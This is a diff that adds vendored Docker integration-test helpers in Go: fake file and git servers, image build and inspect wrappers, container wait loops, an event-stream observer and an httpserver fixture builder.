+type FakeStorage interface { + Close() error + URL() string + CtxDir() string +} + +func fakeBinaryStorage(archives map[string]*bytes.Buffer) (FakeStorage, error) { + ctx, err := fakeContextFromNewTempDir() + if err != nil { + return nil, err + } + for name, content := range archives { + if err := ctx.addFile(name, content.Bytes()); err != nil { + return nil, err + } + } + return fakeStorageWithContext(ctx) +} + +// fakeStorage returns either a local or remote (at daemon machine) file server +func fakeStorage(files map[string]string) (FakeStorage, error) { + ctx, err := fakeContextWithFiles(files) + if err != nil { + return nil, err + } + return fakeStorageWithContext(ctx) +} + +// fakeStorageWithContext returns either a local or remote (at daemon machine) file server +func fakeStorageWithContext(ctx *FakeContext) (FakeStorage, error) { + if isLocalDaemon { + return newLocalFakeStorage(ctx) + } + return newRemoteFileServer(ctx) +} + +// localFileStorage is a file storage on the running machine +type localFileStorage struct { + *FakeContext + *httptest.Server +} + +func (s *localFileStorage) URL() string { + return s.Server.URL +} + +func (s *localFileStorage) CtxDir() string { + return s.FakeContext.Dir +} + +func (s *localFileStorage) Close() error { + defer s.Server.Close() + return s.FakeContext.Close() +} + +func newLocalFakeStorage(ctx *FakeContext) (*localFileStorage, error) { + handler := http.FileServer(http.Dir(ctx.Dir)) + server := httptest.NewServer(handler) + return &localFileStorage{ + FakeContext: ctx, + Server: server, + }, nil +} + +// remoteFileServer is a containerized static file server started on the remote +// testing machine to be used in URL-accepting docker build functionality. +type remoteFileServer struct { + host string // hostname/port web server is listening to on docker host e.g. 
0.0.0.0:43712 + container string + image string + ctx *FakeContext +} + +func (f *remoteFileServer) URL() string { + u := url.URL{ + Scheme: "http", + Host: f.host} + return u.String() +} + +func (f *remoteFileServer) CtxDir() string { + return f.ctx.Dir +} + +func (f *remoteFileServer) Close() error { + defer func() { + if f.ctx != nil { + f.ctx.Close() + } + if f.image != "" { + deleteImages(f.image) + } + }() + if f.container == "" { + return nil + } + return deleteContainer(f.container) +} + +func newRemoteFileServer(ctx *FakeContext) (*remoteFileServer, error) { + var ( + image = fmt.Sprintf("fileserver-img-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10))) + container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10))) + ) + + if err := ensureHTTPServerImage(); err != nil { + return nil, err + } + + // Build the image + if err := fakeContextAddDockerfile(ctx, `FROM httpserver +COPY . /static`); err != nil { + return nil, fmt.Errorf("Cannot add Dockerfile to context: %v", err) + } + if _, err := buildImageFromContext(image, ctx, false); err != nil { + return nil, fmt.Errorf("failed building file storage container image: %v", err) + } + + // Start the container + runCmd := exec.Command(dockerBinary, "run", "-d", "-P", "--name", container, image) + if out, ec, err := runCommandWithOutput(runCmd); err != nil { + return nil, fmt.Errorf("failed to start file storage container. 
ec=%v\nout=%s\nerr=%v", ec, out, err) + } + + // Find out the system assigned port + out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "port", container, "80/tcp")) + if err != nil { + return nil, fmt.Errorf("failed to find container port: err=%v\nout=%s", err, out) + } + + fileserverHostPort := strings.Trim(out, "\n") + _, port, err := net.SplitHostPort(fileserverHostPort) + if err != nil { + return nil, fmt.Errorf("unable to parse file server host:port: %v", err) + } + + dockerHostURL, err := url.Parse(daemonHost()) + if err != nil { + return nil, fmt.Errorf("unable to parse daemon host URL: %v", err) + } + + host, _, err := net.SplitHostPort(dockerHostURL.Host) + if err != nil { + return nil, fmt.Errorf("unable to parse docker daemon host:port: %v", err) + } + + return &remoteFileServer{ + container: container, + image: image, + host: fmt.Sprintf("%s:%s", host, port), + ctx: ctx}, nil +} + +func inspectFieldAndMarshall(c *check.C, name, field string, output interface{}) { + str := inspectFieldJSON(c, name, field) + err := json.Unmarshal([]byte(str), output) + if c != nil { + c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err)) + } +} + +func inspectFilter(name, filter string) (string, error) { + format := fmt.Sprintf("{{%s}}", filter) + inspectCmd := exec.Command(dockerBinary, "inspect", "-f", format, name) + out, exitCode, err := runCommandWithOutput(inspectCmd) + if err != nil || exitCode != 0 { + return "", fmt.Errorf("failed to inspect %s: %s", name, out) + } + return strings.TrimSpace(out), nil +} + +func inspectFieldWithError(name, field string) (string, error) { + return inspectFilter(name, fmt.Sprintf(".%s", field)) +} + +func inspectField(c *check.C, name, field string) string { + out, err := inspectFilter(name, fmt.Sprintf(".%s", field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +func inspectFieldJSON(c *check.C, name, field string) string { + out, err := inspectFilter(name, fmt.Sprintf("json 
.%s", field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +func inspectFieldMap(c *check.C, name, path, field string) string { + out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +func inspectMountSourceField(name, destination string) (string, error) { + m, err := inspectMountPoint(name, destination) + if err != nil { + return "", err + } + return m.Source, nil +} + +func inspectMountPoint(name, destination string) (types.MountPoint, error) { + out, err := inspectFilter(name, "json .Mounts") + if err != nil { + return types.MountPoint{}, err + } + + return inspectMountPointJSON(out, destination) +} + +var errMountNotFound = errors.New("mount point not found") + +func inspectMountPointJSON(j, destination string) (types.MountPoint, error) { + var mp []types.MountPoint + if err := json.Unmarshal([]byte(j), &mp); err != nil { + return types.MountPoint{}, err + } + + var m *types.MountPoint + for _, c := range mp { + if c.Destination == destination { + m = &c + break + } + } + + if m == nil { + return types.MountPoint{}, errMountNotFound + } + + return *m, nil +} + +func inspectImage(name, filter string) (string, error) { + args := []string{"inspect", "--type", "image"} + if filter != "" { + format := fmt.Sprintf("{{%s}}", filter) + args = append(args, "-f", format) + } + args = append(args, name) + inspectCmd := exec.Command(dockerBinary, args...) 
+ out, exitCode, err := runCommandWithOutput(inspectCmd) + if err != nil || exitCode != 0 { + return "", fmt.Errorf("failed to inspect %s: %s", name, out) + } + return strings.TrimSpace(out), nil +} + +func getIDByName(name string) (string, error) { + return inspectFieldWithError(name, "Id") +} + +// getContainerState returns the exit code of the container +// and true if it's running +// the exit code should be ignored if it's running +func getContainerState(c *check.C, id string) (int, bool, error) { + var ( + exitStatus int + running bool + ) + out, exitCode := dockerCmd(c, "inspect", "--format={{.State.Running}} {{.State.ExitCode}}", id) + if exitCode != 0 { + return 0, false, fmt.Errorf("%q doesn't exist: %s", id, out) + } + + out = strings.Trim(out, "\n") + splitOutput := strings.Split(out, " ") + if len(splitOutput) != 2 { + return 0, false, fmt.Errorf("failed to get container state: output is broken") + } + if splitOutput[0] == "true" { + running = true + } + if n, err := strconv.Atoi(splitOutput[1]); err == nil { + exitStatus = n + } else { + return 0, false, fmt.Errorf("failed to get container state: couldn't parse integer") + } + + return exitStatus, running, nil +} + +func buildImageCmd(name, dockerfile string, useCache bool, buildFlags ...string) *exec.Cmd { + return buildImageCmdWithHost(name, dockerfile, "", useCache, buildFlags...) +} + +func buildImageCmdWithHost(name, dockerfile, host string, useCache bool, buildFlags ...string) *exec.Cmd { + args := []string{} + if host != "" { + args = append(args, "--host", host) + } + args = append(args, "build", "-t", name) + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, "-") + buildCmd := exec.Command(dockerBinary, args...) 
+ buildCmd.Stdin = strings.NewReader(dockerfile) + return buildCmd +} + +func buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, error) { + buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...) + out, exitCode, err := runCommandWithOutput(buildCmd) + if err != nil || exitCode != 0 { + return "", out, fmt.Errorf("failed to build the image: %s", out) + } + id, err := getIDByName(name) + if err != nil { + return "", out, err + } + return id, out, nil +} + +func buildImageWithStdoutStderr(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, string, error) { + buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...) + stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) + if err != nil || exitCode != 0 { + return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) + } + id, err := getIDByName(name) + if err != nil { + return "", stdout, stderr, err + } + return id, stdout, stderr, nil +} + +func buildImage(name, dockerfile string, useCache bool, buildFlags ...string) (string, error) { + id, _, err := buildImageWithOut(name, dockerfile, useCache, buildFlags...) + return id, err +} + +func buildImageFromContext(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, error) { + id, _, err := buildImageFromContextWithOut(name, ctx, useCache, buildFlags...) + if err != nil { + return "", err + } + return id, nil +} + +func buildImageFromContextWithOut(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, error) { + args := []string{"build", "-t", name} + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, ".") + buildCmd := exec.Command(dockerBinary, args...) 
+ buildCmd.Dir = ctx.Dir + out, exitCode, err := runCommandWithOutput(buildCmd) + if err != nil || exitCode != 0 { + return "", "", fmt.Errorf("failed to build the image: %s", out) + } + id, err := getIDByName(name) + if err != nil { + return "", "", err + } + return id, out, nil +} + +func buildImageFromContextWithStdoutStderr(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, string, error) { + args := []string{"build", "-t", name} + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, ".") + buildCmd := exec.Command(dockerBinary, args...) + buildCmd.Dir = ctx.Dir + + stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) + if err != nil || exitCode != 0 { + return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) + } + id, err := getIDByName(name) + if err != nil { + return "", stdout, stderr, err + } + return id, stdout, stderr, nil +} + +func buildImageFromGitWithStdoutStderr(name string, ctx *fakeGit, useCache bool, buildFlags ...string) (string, string, string, error) { + args := []string{"build", "-t", name} + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, ctx.RepoURL) + buildCmd := exec.Command(dockerBinary, args...) + + stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) + if err != nil || exitCode != 0 { + return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) + } + id, err := getIDByName(name) + if err != nil { + return "", stdout, stderr, err + } + return id, stdout, stderr, nil +} + +func buildImageFromPath(name, path string, useCache bool, buildFlags ...string) (string, error) { + args := []string{"build", "-t", name} + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, buildFlags...) + args = append(args, path) + buildCmd := exec.Command(dockerBinary, args...) 
+ out, exitCode, err := runCommandWithOutput(buildCmd) + if err != nil || exitCode != 0 { + return "", fmt.Errorf("failed to build the image: %s", out) + } + return getIDByName(name) +} + +type gitServer interface { + URL() string + Close() error +} + +type localGitServer struct { + *httptest.Server +} + +func (r *localGitServer) Close() error { + r.Server.Close() + return nil +} + +func (r *localGitServer) URL() string { + return r.Server.URL +} + +type fakeGit struct { + root string + server gitServer + RepoURL string +} + +func (g *fakeGit) Close() { + g.server.Close() + os.RemoveAll(g.root) +} + +func newFakeGit(name string, files map[string]string, enforceLocalServer bool) (*fakeGit, error) { + ctx, err := fakeContextWithFiles(files) + if err != nil { + return nil, err + } + defer ctx.Close() + curdir, err := os.Getwd() + if err != nil { + return nil, err + } + defer os.Chdir(curdir) + + if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to init repo: %s (%s)", err, output) + } + err = os.Chdir(ctx.Dir) + if err != nil { + return nil, err + } + if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to set 'user.name': %s (%s)", err, output) + } + if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to set 'user.email': %s (%s)", err, output) + } + if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to add files to repo: %s (%s)", err, output) + } + if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to commit to repo: %s (%s)", err, output) + } + + root, err := ioutil.TempDir("", "docker-test-git-repo") + if err != nil { + return nil, 
err + } + repoPath := filepath.Join(root, name+".git") + if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil { + os.RemoveAll(root) + return nil, fmt.Errorf("error trying to clone --bare: %s (%s)", err, output) + } + err = os.Chdir(repoPath) + if err != nil { + os.RemoveAll(root) + return nil, err + } + if output, err := exec.Command("git", "update-server-info").CombinedOutput(); err != nil { + os.RemoveAll(root) + return nil, fmt.Errorf("error trying to git update-server-info: %s (%s)", err, output) + } + err = os.Chdir(curdir) + if err != nil { + os.RemoveAll(root) + return nil, err + } + + var server gitServer + if !enforceLocalServer { + // use fakeStorage server, which might be local or remote (at test daemon) + server, err = fakeStorageWithContext(fakeContextFromDir(root)) + if err != nil { + return nil, fmt.Errorf("cannot start fake storage: %v", err) + } + } else { + // always start a local http server on CLI test machine + httpServer := httptest.NewServer(http.FileServer(http.Dir(root))) + server = &localGitServer{httpServer} + } + return &fakeGit{ + root: root, + server: server, + RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name), + }, nil +} + +// Write `content` to the file at path `dst`, creating it if necessary, +// as well as any missing directories. +// The file is truncated if it already exists. +// Fail the test when error occurs. +func writeFile(dst, content string, c *check.C) { + // Create subdirectories if necessary + c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil) + f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700) + c.Assert(err, check.IsNil) + defer f.Close() + // Write content (truncate if it exists) + _, err = io.Copy(f, strings.NewReader(content)) + c.Assert(err, check.IsNil) +} + +// Return the contents of file at path `src`. +// Fail the test when error occurs. 
+func readFile(src string, c *check.C) (content string) { + data, err := ioutil.ReadFile(src) + c.Assert(err, check.IsNil) + + return string(data) +} + +func containerStorageFile(containerID, basename string) string { + return filepath.Join(containerStoragePath, containerID, basename) +} + +// docker commands that use this function must be run with the '-d' switch. +func runCommandAndReadContainerFile(filename string, cmd *exec.Cmd) ([]byte, error) { + out, _, err := runCommandWithOutput(cmd) + if err != nil { + return nil, fmt.Errorf("%v: %q", err, out) + } + + contID := strings.TrimSpace(out) + + if err := waitRun(contID); err != nil { + return nil, fmt.Errorf("%v: %q", contID, err) + } + + return readContainerFile(contID, filename) +} + +func readContainerFile(containerID, filename string) ([]byte, error) { + f, err := os.Open(containerStorageFile(containerID, filename)) + if err != nil { + return nil, err + } + defer f.Close() + + content, err := ioutil.ReadAll(f) + if err != nil { + return nil, err + } + + return content, nil +} + +func readContainerFileWithExec(containerID, filename string) ([]byte, error) { + out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "exec", containerID, "cat", filename)) + return []byte(out), err +} + +// daemonTime provides the current time on the daemon host +func daemonTime(c *check.C) time.Time { + if isLocalDaemon { + return time.Now() + } + + status, body, err := sockRequest("GET", "/info", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + type infoJSON struct { + SystemTime string + } + var info infoJSON + err = json.Unmarshal(body, &info) + c.Assert(err, check.IsNil, check.Commentf("unable to unmarshal GET /info response")) + + dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) + c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response")) + return dt +} + +// daemonUnixTime returns the current time on the daemon host with nanoseconds 
precision. +// It return the time formatted how the client sends timestamps to the server. +func daemonUnixTime(c *check.C) string { + return parseEventTime(daemonTime(c)) +} + +func parseEventTime(t time.Time) string { + return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())) +} + +func setupRegistry(c *check.C, schema1 bool, auth, tokenURL string) *testRegistryV2 { + reg, err := newTestRegistryV2(c, schema1, auth, tokenURL) + c.Assert(err, check.IsNil) + + // Wait for registry to be ready to serve requests. + for i := 0; i != 50; i++ { + if err = reg.Ping(); err == nil { + break + } + time.Sleep(100 * time.Millisecond) + } + + c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for test registry to become available: %v", err)) + return reg +} + +func setupNotary(c *check.C) *testNotary { + ts, err := newTestNotary(c) + c.Assert(err, check.IsNil) + + return ts +} + +// appendBaseEnv appends the minimum set of environment variables to exec the +// docker cli binary for testing with correct configuration to the given env +// list. +func appendBaseEnv(isTLS bool, env ...string) []string { + preserveList := []string{ + // preserve remote test host + "DOCKER_HOST", + + // windows: requires preserving SystemRoot, otherwise dial tcp fails + // with "GetAddrInfoW: A non-recoverable error occurred during a database lookup." 
+ "SystemRoot", + + // testing help text requires the $PATH to dockerd is set + "PATH", + } + if isTLS { + preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH") + } + + for _, key := range preserveList { + if val := os.Getenv(key); val != "" { + env = append(env, fmt.Sprintf("%s=%s", key, val)) + } + } + return env +} + +func createTmpFile(c *check.C, content string) string { + f, err := ioutil.TempFile("", "testfile") + c.Assert(err, check.IsNil) + + filename := f.Name() + + err = ioutil.WriteFile(filename, []byte(content), 0644) + c.Assert(err, check.IsNil) + + return filename +} + +func buildImageWithOutInDamon(socket string, name, dockerfile string, useCache bool) (string, error) { + args := []string{"--host", socket} + buildCmd := buildImageCmdArgs(args, name, dockerfile, useCache) + out, exitCode, err := runCommandWithOutput(buildCmd) + if err != nil || exitCode != 0 { + return out, fmt.Errorf("failed to build the image: %s, error: %v", out, err) + } + return out, nil +} + +func buildImageCmdArgs(args []string, name, dockerfile string, useCache bool) *exec.Cmd { + args = append(args, []string{"-D", "build", "-t", name}...) + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, "-") + buildCmd := exec.Command(dockerBinary, args...) + buildCmd.Stdin = strings.NewReader(dockerfile) + return buildCmd + +} + +func waitForContainer(contID string, args ...string) error { + args = append([]string{dockerBinary, "run", "--name", contID}, args...) + result := icmd.RunCmd(icmd.Cmd{Command: args}) + if result.Error != nil { + return result.Error + } + return waitRun(contID) +} + +// waitRestart will wait for the specified container to restart once +func waitRestart(contID string, duration time.Duration) error { + return waitInspect(contID, "{{.RestartCount}}", "1", duration) +} + +// waitRun will wait for the specified container to be running, maximum 5 seconds. 
+func waitRun(contID string) error { + return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second) +} + +// waitExited will wait for the specified container to state exit, subject +// to a maximum time limit in seconds supplied by the caller +func waitExited(contID string, duration time.Duration) error { + return waitInspect(contID, "{{.State.Status}}", "exited", duration) +} + +// waitInspect will wait for the specified container to have the specified string +// in the inspect output. It will wait until the specified timeout (in seconds) +// is reached. +func waitInspect(name, expr, expected string, timeout time.Duration) error { + return waitInspectWithArgs(name, expr, expected, timeout) +} + +func waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error { + after := time.After(timeout) + + args := append(arg, "inspect", "-f", expr, name) + for { + result := icmd.RunCommand(dockerBinary, args...) + if result.Error != nil { + if !strings.Contains(result.Stderr(), "No such") { + return fmt.Errorf("error executing docker inspect: %v\n%s", + result.Stderr(), result.Stdout()) + } + select { + case <-after: + return result.Error + default: + time.Sleep(10 * time.Millisecond) + continue + } + } + + out := strings.TrimSpace(result.Stdout()) + if out == expected { + break + } + + select { + case <-after: + return fmt.Errorf("condition \"%q == %q\" not true in time", out, expected) + default: + } + + time.Sleep(100 * time.Millisecond) + } + return nil +} + +func getInspectBody(c *check.C, version, id string) []byte { + endpoint := fmt.Sprintf("/%s/containers/%s/json", version, id) + status, body, err := sockRequest("GET", endpoint, nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + return body +} + +// Run a long running idle task in a background container using the +// system-specific default image and command. 
+func runSleepingContainer(c *check.C, extraArgs ...string) (string, int) { + return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...) +} + +// Run a long running idle task in a background container using the specified +// image and the system-specific command. +func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) (string, int) { + args := []string{"run", "-d"} + args = append(args, extraArgs...) + args = append(args, image) + args = append(args, sleepCommandForDaemonPlatform()...) + return dockerCmd(c, args...) +} + +func getRootUIDGID() (int, int, error) { + uidgid := strings.Split(filepath.Base(dockerBasePath), ".") + if len(uidgid) == 1 { + //user namespace remapping is not turned on; return 0 + return 0, 0, nil + } + uid, err := strconv.Atoi(uidgid[0]) + if err != nil { + return 0, 0, err + } + gid, err := strconv.Atoi(uidgid[1]) + if err != nil { + return 0, 0, err + } + return uid, gid, nil +} + +// minimalBaseImage returns the name of the minimal base image for the current +// daemon platform. 
+func minimalBaseImage() string { + if daemonPlatform == "windows" { + return WindowsBaseImage + } + return "scratch" +} + +func getGoroutineNumber() (int, error) { + i := struct { + NGoroutines int + }{} + status, b, err := sockRequest("GET", "/info", nil) + if err != nil { + return 0, err + } + if status != http.StatusOK { + return 0, fmt.Errorf("http status code: %d", status) + } + if err := json.Unmarshal(b, &i); err != nil { + return 0, err + } + return i.NGoroutines, nil +} + +func waitForGoroutines(expected int) error { + t := time.After(30 * time.Second) + for { + select { + case <-t: + n, err := getGoroutineNumber() + if err != nil { + return err + } + if n > expected { + return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n) + } + default: + n, err := getGoroutineNumber() + if err != nil { + return err + } + if n <= expected { + return nil + } + time.Sleep(200 * time.Millisecond) + } + } +} + +// getErrorMessage returns the error message from an error API response +func getErrorMessage(c *check.C, body []byte) string { + var resp types.ErrorResponse + c.Assert(json.Unmarshal(body, &resp), check.IsNil) + return strings.TrimSpace(resp.Message) +} + +func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) { + after := time.After(timeout) + for { + v, comment := f(c) + assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params) + select { + case <-after: + assert = true + default: + } + if assert { + if comment != nil { + args = append(args, comment) + } + c.Assert(v, checker, args...) 
+ return + } + time.Sleep(100 * time.Millisecond) + } +} + +type checkF func(*check.C) (interface{}, check.CommentInterface) +type reducer func(...interface{}) interface{} + +func reducedCheck(r reducer, funcs ...checkF) checkF { + return func(c *check.C) (interface{}, check.CommentInterface) { + var values []interface{} + var comments []string + for _, f := range funcs { + v, comment := f(c) + values = append(values, v) + if comment != nil { + comments = append(comments, comment.CheckCommentString()) + } + } + return r(values...), check.Commentf("%v", strings.Join(comments, ", ")) + } +} + +func sumAsIntegers(vals ...interface{}) interface{} { + var s int + for _, v := range vals { + s += v.(int) + } + return s +} diff --git a/vendor/github.com/docker/docker/integration-cli/events_utils.go b/vendor/github.com/docker/docker/integration-cli/events_utils.go new file mode 100644 index 0000000000..ba241796b3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/events_utils.go @@ -0,0 +1,206 @@ +package main + +import ( + "bufio" + "bytes" + "io" + "os/exec" + "regexp" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + eventstestutils "github.com/docker/docker/daemon/events/testutils" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// eventMatcher is a function that tries to match an event input. +// It returns true if the event matches and a map with +// a set of key/value to identify the match. +type eventMatcher func(text string) (map[string]string, bool) + +// eventMatchProcessor is a function to handle an event match. +// It receives a map of key/value with the information extracted in a match. +type eventMatchProcessor func(matches map[string]string) + +// eventObserver runs an events commands and observes its output. 
+type eventObserver struct { + buffer *bytes.Buffer + command *exec.Cmd + scanner *bufio.Scanner + startTime string + disconnectionError error +} + +// newEventObserver creates the observer and initializes the command +// without running it. Users must call `eventObserver.Start` to start the command. +func newEventObserver(c *check.C, args ...string) (*eventObserver, error) { + since := daemonTime(c).Unix() + return newEventObserverWithBacklog(c, since, args...) +} + +// newEventObserverWithBacklog creates a new observer changing the start time of the backlog to return. +func newEventObserverWithBacklog(c *check.C, since int64, args ...string) (*eventObserver, error) { + startTime := strconv.FormatInt(since, 10) + cmdArgs := []string{"events", "--since", startTime} + if len(args) > 0 { + cmdArgs = append(cmdArgs, args...) + } + eventsCmd := exec.Command(dockerBinary, cmdArgs...) + stdout, err := eventsCmd.StdoutPipe() + if err != nil { + return nil, err + } + + return &eventObserver{ + buffer: new(bytes.Buffer), + command: eventsCmd, + scanner: bufio.NewScanner(stdout), + startTime: startTime, + }, nil +} + +// Start starts the events command. +func (e *eventObserver) Start() error { + return e.command.Start() +} + +// Stop stops the events command. +func (e *eventObserver) Stop() { + e.command.Process.Kill() + e.command.Process.Release() +} + +// Match tries to match the events output with a given matcher. 
+func (e *eventObserver) Match(match eventMatcher, process eventMatchProcessor) { + for e.scanner.Scan() { + text := e.scanner.Text() + e.buffer.WriteString(text) + e.buffer.WriteString("\n") + + if matches, ok := match(text); ok { + process(matches) + } + } + + err := e.scanner.Err() + if err == nil { + err = io.EOF + } + + logrus.Debugf("EventObserver scanner loop finished: %v", err) + e.disconnectionError = err +} + +func (e *eventObserver) CheckEventError(c *check.C, id, event string, match eventMatcher) { + var foundEvent bool + scannerOut := e.buffer.String() + + if e.disconnectionError != nil { + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", e.startTime, "--until", until) + events := strings.Split(strings.TrimSpace(out), "\n") + for _, e := range events { + if _, ok := match(e); ok { + foundEvent = true + break + } + } + scannerOut = out + } + if !foundEvent { + c.Fatalf("failed to observe event `%s` for %s. Disconnection error: %v\nout:\n%v", event, id, e.disconnectionError, scannerOut) + } +} + +// matchEventLine matches a text with the event regular expression. +// It returns the matches and true if the regular expression matches with the given id and event type. +// It returns an empty map and false if there is no match. +func matchEventLine(id, eventType string, actions map[string]chan bool) eventMatcher { + return func(text string) (map[string]string, bool) { + matches := eventstestutils.ScanMap(text) + if len(matches) == 0 { + return matches, false + } + + if matchIDAndEventType(matches, id, eventType) { + if _, ok := actions[matches["action"]]; ok { + return matches, true + } + } + return matches, false + } +} + +// processEventMatch closes an action channel when an event line matches the expected action. 
+func processEventMatch(actions map[string]chan bool) eventMatchProcessor { + return func(matches map[string]string) { + if ch, ok := actions[matches["action"]]; ok { + ch <- true + } + } +} + +// parseEventAction parses an event text and returns the action. +// It fails if the text is not in the event format. +func parseEventAction(c *check.C, text string) string { + matches := eventstestutils.ScanMap(text) + return matches["action"] +} + +// eventActionsByIDAndType returns the actions for a given id and type. +// It fails if the text is not in the event format. +func eventActionsByIDAndType(c *check.C, events []string, id, eventType string) []string { + var filtered []string + for _, event := range events { + matches := eventstestutils.ScanMap(event) + c.Assert(matches, checker.Not(checker.IsNil)) + if matchIDAndEventType(matches, id, eventType) { + filtered = append(filtered, matches["action"]) + } + } + return filtered +} + +// matchIDAndEventType returns true if an event matches a given id and type. +// It also resolves names in the event attributes if the id doesn't match. 
+func matchIDAndEventType(matches map[string]string, id, eventType string) bool { + return matchEventID(matches, id) && matches["eventType"] == eventType +} + +func matchEventID(matches map[string]string, id string) bool { + matchID := matches["id"] == id || strings.HasPrefix(matches["id"], id) + if !matchID && matches["attributes"] != "" { + // try matching a name in the attributes + attributes := map[string]string{} + for _, a := range strings.Split(matches["attributes"], ", ") { + kv := strings.Split(a, "=") + attributes[kv[0]] = kv[1] + } + matchID = attributes["name"] == id + } + return matchID +} + +func parseEvents(c *check.C, out, match string) { + events := strings.Split(strings.TrimSpace(out), "\n") + for _, event := range events { + matches := eventstestutils.ScanMap(event) + matched, err := regexp.MatchString(match, matches["action"]) + c.Assert(err, checker.IsNil) + c.Assert(matched, checker.True, check.Commentf("Matcher: %s did not match %s", match, matches["action"])) + } +} + +func parseEventsWithID(c *check.C, out, match, id string) { + events := strings.Split(strings.TrimSpace(out), "\n") + for _, event := range events { + matches := eventstestutils.ScanMap(event) + c.Assert(matchEventID(matches, id), checker.True) + + matched, err := regexp.MatchString(match, matches["action"]) + c.Assert(err, checker.IsNil) + c.Assert(matched, checker.True, check.Commentf("Matcher: %s did not match %s", match, matches["action"])) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures.go b/vendor/github.com/docker/docker/integration-cli/fixtures.go new file mode 100644 index 0000000000..e99b738158 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures.go @@ -0,0 +1,69 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "sync" +) + +var ensureHTTPServerOnce sync.Once + +func ensureHTTPServerImage() error { + var doIt bool + ensureHTTPServerOnce.Do(func() { + doIt = true + }) + + if 
!doIt { + return nil + } + + protectedImages["httpserver:latest"] = struct{}{} + + tmp, err := ioutil.TempDir("", "docker-http-server-test") + if err != nil { + return fmt.Errorf("could not build http server: %v", err) + } + defer os.RemoveAll(tmp) + + goos := daemonPlatform + if goos == "" { + goos = "linux" + } + goarch := os.Getenv("DOCKER_ENGINE_GOARCH") + if goarch == "" { + goarch = "amd64" + } + + goCmd, lookErr := exec.LookPath("go") + if lookErr != nil { + return fmt.Errorf("could not build http server: %v", lookErr) + } + + cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver") + cmd.Env = append(os.Environ(), []string{ + "CGO_ENABLED=0", + "GOOS=" + goos, + "GOARCH=" + goarch, + }...) + var out []byte + if out, err = cmd.CombinedOutput(); err != nil { + return fmt.Errorf("could not build http server: %s", string(out)) + } + + cpCmd, lookErr := exec.LookPath("cp") + if lookErr != nil { + return fmt.Errorf("could not build http server: %v", lookErr) + } + if out, err = exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil { + return fmt.Errorf("could not build http server: %v", string(out)) + } + + if out, err = exec.Command(dockerBinary, "build", "-q", "-t", "httpserver", tmp).CombinedOutput(); err != nil { + return fmt.Errorf("could not build http server: %v", string(out)) + } + return nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test 